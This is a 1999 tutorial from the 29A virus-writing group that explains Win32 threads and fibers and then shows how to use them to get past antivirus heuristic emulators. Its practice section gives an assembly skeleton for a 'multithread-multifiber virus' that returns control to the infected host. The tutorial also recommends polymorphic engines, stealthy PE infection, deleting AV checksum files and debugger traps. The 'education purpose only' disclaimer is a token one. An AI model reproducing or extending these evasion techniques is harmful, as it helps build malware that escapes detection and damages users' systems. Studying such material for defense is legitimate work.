ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÚÄ Threads and fibers under Win32 Ä¿ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ³ by ³ ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÀÄÄÄÄÄÄÄÄÄÄ Benny / 29A ÄÄÄÄÄÄÄÄÄÄÄÙ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 1. Disclamer ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The followin' document is an education purpose only. Author isn't responsible for any misuse of the things written in this document. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 2. Foreword ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Before I decided to write this article, I've written two viruses that uses followin techniques. I think, I have some experiences with this stuff, but anyway, if u find some errors, mistypes, or another things, please don't wait and mail me to benny@post.cz. U can also meet me in #vir and #virus on UnderNet IRC. Thank you ! ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 3. Introduction ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ When Win32 platforms were released, all seems to be differently. VXers had to learn new techniques, learn new APIs, learn to build defense against AV scanners. AVers had to learn it too and much more. They had to rebuild their scanners and heuristix to 32bit (for PE header), and also their code emulator. Now, it seems to be all done, seems to be impossible to code new stuff, that blinds AV scanner. Is it really impossible ? The answer is NO ! I will explain new techniques in this article. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 4. Brief view to processes, threads and fibers ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 4.1 Processes ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I can hear your words: "Ehrm,.... super, but.... what can u say about processes, I think, I know everything important, there's nothing more to explain." No, I don't think so. If u don't know threads, u don't know processes. So, what's the process ? Process is usualy defined as instance of runnin' program. In Win32 interface has every process its own 4GB address space. Difference between Win32 and 16bit app (Win16 and DOS) is that process in Win32 interface is inert, nonactive, i.e. it has ONLY its 4GB address space where is stored code and data of EXE file application. All needed DLLs r stored in address space of runnin' process too. Process can own more resources, for example dynamic allocated memory, kernel objects (files, semaphores, mutexes, critical sections...) or threads. Of course, all resources allocated in process will be automaticaly deallocated, when process exits (next different between processes in Win32 and Win16/DOS). I said, processes r inert. When process needs to be executed, its time for thread. Thread executes processes code stored in its address space. Process can own more than one primary* thread - so thread has its own register set and stack. Every process has at least one primary* thread. If not, there isn't any reason for process existency and will be immediatly terminated by OS. How worx switchin' between threads ? Operatin' system commit's processor's time to every thread and create's illusion of execution of all processes by commitin' CPU time to each thread in a loop. When process is created, Windows will automaticaly create one thread called *primary thread, so process is able to run. Primary thread can create more threads and they can also create more threads, etc... Windows NT is able to use computers, with more than one processor by commitin' processors to threads, so threads r really runnin' in same time. All thread-timin' is up to WinNT kernel. Windows 95/98 isn't able to manage more than one processor, so u can run Win95/98 on multiprocessor board but Win95/98 will run only on one processor. Process can be terminated by: 1) by "ExitProcess" API syntax: void ExitProcess(UINT fuExitCode); Terminates process and sets exit code to value of fuExitCode variable. It's recommanded to terminate process by this API. 2) by "TerminateProcess" API syntax: BOOL TerminateProcess(HANDLE hProcess, UINT fuExitCode); This funtion can be called from another process. However, it isn't recommanded to terminate process by this API, coz process or its DLLs may work with disk, so u can lose some data...! 3) There aren't any threads, so process is immediately terminated. 4.2 Threads ÄÄÄÄÄÄÄÄÄÄÄÄÄ I said, thread executes code of process. I also said, u can create so many threads u want. Why r applications usin' threads ? Imagine, u have some stupid program, for example Micro$hit Word. When u wanna print something, Word creates next thread. That will manage printin' of data and u will be still able to edit document. Every thread function must have this prototype: DWORD WINAPI ThreadFunc(LPVOID lpvTParam); When u call API function to create thread, OS will call this internal function: void WINAPI StartOfThread(LP_THREAD_START_ROUTINE lpStartAddr, LPVOID lpvTParam) { __try { ExitThread(lpStartAddr(lpvTParam)); } __except(UnhandledExceptionFilter(GetExceptionInformation))) ExitProcess(GetExceptionCode()); } } The truth name of that function isn't known, so I call it StartOfThread. As u can see, StartOfThread funtion will create SEH frame for thread. If will some error cause an exception and u won't handle it, thread will be immediately terminated (but process will still run). Before I say how can u create your own thread, I'll explain u some things, u should know. 1) Threads stack Every thread has its own stack allocated in 4GB address space of process. So if u r usin' global variables, every thread can access it. So it's more than recommanded that u use local variables. U will have less problems with synchronizin' threads. Standard size of stack is 1MB. 2) Context structure Every thread has its own register set called thread context. Context structure contain values of registers in the last time, thread was executed. Context structure is the only one structure in Win32 interface, that is processor dependent, so context has another items on Intel and on another machine (PowerPC, Alpha, MiPS, Sparc, etc...). CreateThread API: syntax: HANDLE CreateThread(LPSECURITY_ATTRIBUTES lpsa, DWORD cbStack, LPTHREAD_START_ROUTINE lpStartAddr, LPVOID lpvTParam, DWORD fdwCreate, LPDWORD lpThreadID); Parameters: a) lpsa: Pointer to SECURITY_ATTRIBUTES structure. If u wanna use default security attributes, be sure this has always NULL value. b) cbStack: Holds number of bytes from address space u wanna use for stack. Use NULL for default stack size = 1MB. c) lpStartAddr: Holds raw address to your thread function. d) lpvTParam: Holds 32bit parameter. e) fdwCreate: Should be NULL or CREATE_SUSPENDED. If fdwCreate has CREATE_SUSPENDED value, it will create thread, sets context items, prepares thread to execution and suspends thread, so thread won't execute. U can resume it by ResumeThread API. f) lpThreadID: Last parameter MUST be valid address of DWORD type. CreateThread will store ID of new thread into this variable. Thread can be terminated by: 1) by "ExitThread" API syntax: void ExitThread(UINT fuExitCode); Terminates thread and sets exit code to value of fuExitCode variable. It's recommanded to terminate thread by this API. 2) by "TerminateThread" API syntax: BOOL TerminateThread(HANDLE hThread, UINT fuExitCode); This funtion can be called from another thread. However, it isn't recommanded to terminate thrad by this API. When u will do this, operatin' system WON'T deallocate its stack (there can be valid variables) ! So be sure, thread is always terminated by itself. How to suspend and resume threads ? There r two APIs called SuspendThread and ResumeThread. syntaxes: DWORD SuspendThread(HANDLE hThread); DWORD ResumeThread(HANDLE hThread); First API will increment suspension counter, second will decrement it. Thread will run only when suspension counter will be NULL. Note: Be sure u will close everytime handle of your thread by CloseHandle API. 4.3 Fibers ÄÄÄÄÄÄÄÄÄÄÄÄ Whatsa go ? Service Pack 3 for Microsoft Windows NT 3.51 brought into operatin' system new services called fibers. Fibers were added into Win32 to make easier portin' applications from UNIX to WinNT. Those onethreaded-server-UNIX applications were programmed, they could access "more clients in one time". Authors of those applications created their own libraries for simulatin' multithreadin', that could create more stax, store registers and allowed to switch between clients tasx. But portin' apps from UNIX to Win32 was so difficult (guess why), that Micro$hit decided to create some APIs for make it easier. Oh g0d, they didn't know, virus coders will like it more than UNIXers ;-))). So, what's the general different between threads and fibers ? Threads r implemented by Windows kernel. Kernel know all threads secrets and schedulin' 'em by Micro$hit defined algorithms. U can change their priorities, u can suspend 'em, u can resume 'em, but still, it's in 50% up to OS, which thread will run, which not and how it will run. Fibers r defined by user code. Kernel doesn't know anythin' about fibers and its execution is directed by your defined algorithms. Coz algorithms for switchin' between fibers r defined by U, from kernel view it isn't preemptive switchin'. Next important thing is that one thread can contain one or more fibers. From kernel view, preemptive switchin' is aplied ONLY to threads and threads can execute their code. But thread is able to execute only one fiber at one time - it's up to u, which fiber will be executed. Note: Unfortunately, fibers aren't implemented in Win95. So if u wanna code multifiber virus, it will run only under Win98+/NT. First action, u have to do (when u wanna work with fibers) is to convert thread to fiber. There's one API for this purpose... syntax: LPVOID ConvertThreadToFiber(LPVOID lpParameter); This function will allocate memory for fiber context structure (it's about 200 bytes). Fiber context stores these informations: a) User defined 32bit value - lpParameter b) Information needed for SEH (Structured Exception Handlin') c) Address of fiber's stack. d) CPU registers (EIP, ...) NOTE: Context structure of thread and context structure of fiber r different things, remember it...! After initialization fiber context is new fiber runnin' inside your thread. Return value of this API function is address to fiber context. We will need this address l8r. There isn't any reason for convertin' thread to fiber, if u don't wanna create next fibers in your thread. U can create new fiber by this API: syntax: LPVOID CreateFiber(DWORD dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter); Firstly, this API will try to create new stack with dwStackSize size (this value should be NULL => standart stack size = 1MB). Then it creates new fiber context (user defined value of variable lpParameter will be store to context). Parameter lpStartAddress holds address of your new fiber function with this prototype: void WINAPI FiberFunc(PVOID lpParameter); After first execution, fiber will get value of lpParameter - same as lpParameter in CreateFiber. U can do u want in this function, but look - this funtion doesn't return any value. Reason is that funtion shouldn't ever return. If fiber function will return, fiber and all fibers created in it will be deleted...! As function ConvertThreadToFiber, so CreateFiber function returns address of fiber context. CreateFiber won't execute fiber immediately coz current fiber is still runnin' (different to ConvertThreadToFiber). Switchin' between fibers is realised by this API: syntax: void SwitchToFiber(LPVOID lpFiber); This API has only one parameter - lpFiber - that's address of fiber context, which u got by previous callin' of ConvertThreadToFiber or CreateThread API. SwitchToFiber API is the only way, how can u switch between fibers. Coz u need to call this API everytime, u wanna switch to another fiber, u have all control on your code. REMEMBER, schedullin' of threads is another thing than schedullin' of fibers. Thread (where r runnin' all fibers) is still under kernel control. When your thread has commited processor time, only actual fiber will run in your thread. But as I said, it's up to u, which fiber will run and which not. When u wanna delete some Fiber, use DeleteFiber API: syntax: void DeleteFiber(LPVOID lpFiber); lpFiber is address of fiber context, which holds fiber, u wanna delete. This will delete fiber's stack and fiber context. WARNING, if lpFiber holds the same address as is context of actual fiber, DeleteFiber API will internaly call ExitThread API and exits actual thread and delete all fiber created in it...! This API usually calls one fiber and deletes so another fiber. Look at differences between threads and fibers again: thread usually terminates itself by callin' ExitThread API. If u will use TerminateThread API, system won't delete its stack. However, fibers r usin' this technique of terminatin' "each by each" very frequently. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 5. Practice ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Huh, do u still remember all previous stuff ? I hope u do, coz we will have some practice now. This will be more funny, u'll see... Now, u probably think: "hmmmm, interestin', but... how can I use it in viruses ?" Don't worry, just read...xDD How can u use it ? U probably have some kewl AV program, that can find all your viriis by heuristic way. I think, u've got something like this. So, how does code analyzer work ? It steps machine code instruction by instruction not directly, but by some emulator, that can emulate all opcodes. Analyzer compares registers and other flags and watches, what program does... AV scanners r out in this age of poly engines, so heuristic analyze is the most perspective way. So question "how can I fuck AVers" seems to be same to "how can I fuck heuristic analyzer, resp. machine emulator". There were many ways how to fuck emulator, e.g. PIQ trix, pmode/fpu instructions, tunellin' techniques, etc... Some of these techniques can't run in Win32 interface or they haven't that effect, we wanted to have. So, here comes new technique of "AV fuckin'", specially designed for Win32 platforms ==> threads and fibers. How does it function ? Simply... Imagin, how machine emulator worx. U have one infected program. What can emulator "see" ? "Hmmm, it has some loops, then it stores some addreses (probably API addresses), it calls one API and then i can see infinite loop. Huh, it doesn't look like infected program !" If emulator is really emulator, it can't call opcodes directly. It must simulate 'em. Hehe, but fortunately, he can't dynamicaly create threads or fibers - he can't simulate virtual machine. Yeah, u know, what i'm tryin' to say. Your virus will simply create thread / fiber and all virus actions will be executed inside that. Better way: Your virus will create for every action one thread / fiber, so there u can have about ten threads / fibers. The best way: combination of threads and fibers. Do u really think, emulator can emulate it ? The only way, how can AV program detect this virus is: a) by checkin' PE for suspicious flags b) checksum analyzer c) by steppin' poly engine or another stuff from where is placed first thread / fiber creation call. d) completly rebuild emulator (that's not easy !), so emulator would be able to trace into API / thread / fiber calls. Combination of metamorphic engine, residency, compression, spreadin' capabilities (e.g. by mail) and threads + fibers could be called as "perfect" virus ;)))) That isn't so far... Now u know everything u need to code something kewl. Let's do it... ;Firstly, we need to get delta offset into EBP register... ;<=== START_OF_PRIMARY_THREAD ===> pushad call gdelta gdelta: pop ebp sub ebp, offset gdelta ;Delta offset is now in EBP register. ;Assume, we have already stored all needed API addresses, we wanna create ;thread, from where will we call the rest of our stuff... cdq ;edx=0 lea eax, [ebp + dwThreadID] push eax ;lpThreadID push edx ;fdwCreate push ebp ;lpvTParam as delta offset lea eax, [ebp + MainThread] push eax ;lpStartAddr push edx ;cbStack push edx ;lpsa call [ebp + ddCreateThread] ;create new thread xchg eax, ecx jecxz error ;error ? ;New thread is now runnin' in MainThread function. We need to suspend primary ;thread while our new thread is runnin'. We do this by callin' ;WaitForSingleObject API. Primary thread will be SUSPENDED (processor won't commit its time to thread) until our thread will be terminated. push -1 ;how many ms will we wait: INFINITE. push ecx ;handle of thread: hThread. call [ebp + ddWaitForSingleObject] ;wait for signalization of thread. ;We can get to here only after thread termination. However, function of ;primary thread ends here. The last thing, our primary thread has to do is ;jump to host. error: popad ;some error, restore stack ... ;prepare jump to host jmp to_host / ret ;jump to host ;<=== END_OF_PRIMARY_THREAD ===> ;<=== START_OF_SECONDARY_THREAD ===> MainThread Proc Pascal delta_param:DWORD ;our thread function ;with one parameter pushad ;push all regs mov ebx, delta_param ;ebx = delta offset ;We stored parameter (delta offset value) in EBX register. EBX is very useful, ;coz non of all known APIs r usin' 'em. ;Now we will convert our thread to fiber, so we can create more fibers in it. ;We also need to store its context. push 0 ;lpParameter call [ebx + ddConvertThreadToFiber] ;convert our thread xchg eax, ecx ;to fiber jecxz end_mainthread ;error ? mov [ebx + lpMainFiber], ecx ;store fiber context ;Now, we will create new fiber to fuck code analyzer / emulator. push ebx ;lpParameter lea eax, [ebx + MainFiber] push eax ;lpStartAddr push 0 ;cbStack call [ebx + ddCreateFiber] ;create new fiber xchg eax, ecx jecxz end_mainthread ;error ? mov [ebx + lpNextFiber], ecx ;store fiber context ;By switchin' to fiber will we definetly fool code analyzer / emulator. push ecx ;fiber context call [ebx + ddSwitchToFiber] ;switch to new fiber ;In case of error or in the end of execution of MainFiber will virus continue ;here. end_mainthread: popad ;restore stack ret ;and ExitThread MainThread EndP ;<=== END_OF_SECONDARY_THREAD ===> ;<=== START_OF_FIBER ===> MainFiber Proc Pascal delta_param:DWORD ;our fiber proc pushad ;push all regs mov ebx, delta_param ;ebx = delta offset ;Here u should create more threads or fibers and there have a code... push [ebx + lpMainFiber] ;switch back to previous call [ebx + ddSwitchToFiber] ;fiber. popad ;restore stack ret ;and DeleteFiber MainFiber EndP ;<=== END_OF_FIBER ===> Now, u have pretty good skeleton of multithread-multifiber virus. Perhaps, u wanna ask me, if your virus is now "undetectable" by simple methods. Answer is NO. What more do u need to code ? 1) Some good polymorphic/metamorphic engine, that should be able to: - generate different instructions, which does the same thing - swap instructions - generate junk instructions - generate random size decryptor - create calls/jumps to dummy routines - should be based only on random numbers 2) PE header infection routine, that WON'T trigger AV flags, e.g: - do not create new section, only append virus to last one or use another way to handle this problem. - do not modify entrypoint, just patch host code to jump to virus. - try to find out method, how to modify PE header in the least possible range 3) Thread/fiber that deletes AV checksum files 4) More debugger traps, e.g. usin' SEH, RING0 code, etc... Note: That was the one from many ways, how to use threads and fibers in your code. Next way could be use only threads instead fibers. But if u will implement code with 15 threads in your virus, u will have many problems with synchronization. U know, that all threads r runnin' pararelly in Windoze, "in the same time". So u have to synchronize 'em. There r many ways, how to do it. But thats another story. I dont wanna be this tute about thread synchronization... Get Win32 SDK, read some good book(s)... ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 6. Closin' ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ I hope, after this tute u know, what r processes, what r threads and what r fibers, and finally how can u use 'em in your viruses. Threads and fibers won't do all your work, u have to code more stuff to be your virus really kewl. But it can help ya to make your virus more "AV proof" and to know operatin' system at all. If you have ANY questions about these features of "Wir32" or if u have some comments about this tute, u know, where can u find me. Some greetz: Darkman/29A, Super/29A, Jacky Qwerty/29A, VirusBust/29A, MrSandman, Billy_Bel/DDT, LethalMnd, more 29Aers, more DDTers, more virus coders, more and more... ÚÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³ Benny / 29A, 1999 º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ